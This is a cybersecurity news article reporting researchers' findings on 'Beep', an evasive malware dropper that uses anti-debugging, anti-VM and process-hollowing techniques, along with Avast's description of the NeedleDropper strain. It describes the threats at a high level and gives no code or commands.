Experts Warn of ‘Beep’ – A New Evasive Malware That Can Fly Under the Radar

Feb 15, 2023Ravie LakshmananThreat Detection / Malware

Cybersecurity researchers have unearthed a new piece of evasive
malware dubbed Beep that’s designed to fly under
the radar and drop additional payloads onto a compromised host.

“It seemed as if the authors of this malware were trying to
implement as many anti-debugging and anti-VM (anti-sandbox)
techniques as they could find,” Minerva Labs researcher Natalie
Zargarov said ^[1].

“One such technique involved delaying execution through the use
of the Beep API function ^[2], hence the malware’s
name.”

Beep comprises three components, the first of which is a dropper
that’s responsible for creating a new Windows Registry key and
executing a Base64-encoded PowerShell script stored in it.

The PowerShell script, for its part, reaches out to a remote
server to retrieve an injector, which, after confirming it’s not
being debugged or launched in a virtual machine, extracts and
launches the payload via a technique called process hollowing ^[3].

The payload is an information stealer that’s equipped to collect
and exfiltrate system information and enumerate running processes.
Other instructions the malware is capable of accepting from a
command-and-control (C2) server include the ability to execute DLL
and EXE files.

A number of other features are yet to be implemented, suggesting
that Beep is still in its early stages of development.

What sets the emerging malware apart is its heavy focus on
stealth, adopting a sheer number of detection evasion
methods ^[4] in an attempt to resist
analysis, avoid sandboxes, and delay execution.

“Once this malware successfully penetrates a system, it can
easily download and spread a wide range of additional malicious
tools, including ransomware, making it extremely dangerous,”
Zargarov noted.

The findings come as antivirus vendor Avast revealed details of
another dropper strain codenamed NeedleDropper
that has been used to distribute different malware families since
October 2022.

Delivered via spam email attachments, Discord, or OneDrive URLs,
the malware is suspected to be offered as a service for other
criminal actors looking to distribute their own payloads.

“The malware tries to hide itself by dropping many unused,
invalid files and stores important data between several MB of
unimportant data, and also utilizes legitimate applications to
perform its execution,” the company said ^[5].

Found this article interesting? Follow us on Twitter ^[6]
and LinkedIn ^[7]
to read more exclusive content we post.

References

^{^}
said
(minerva-labs.com)
^{^}
Beep API
function (learn.microsoft.com)
^{^}
process
hollowing (attack.mitre.org)
^{^}
detection evasion methods
(anti-debug.checkpoint.com)
^{^}
said
(decoded.avast.io)
^{^}
Twitter
 (twitter.com)
^{^}
LinkedIn
(www.linkedin.com)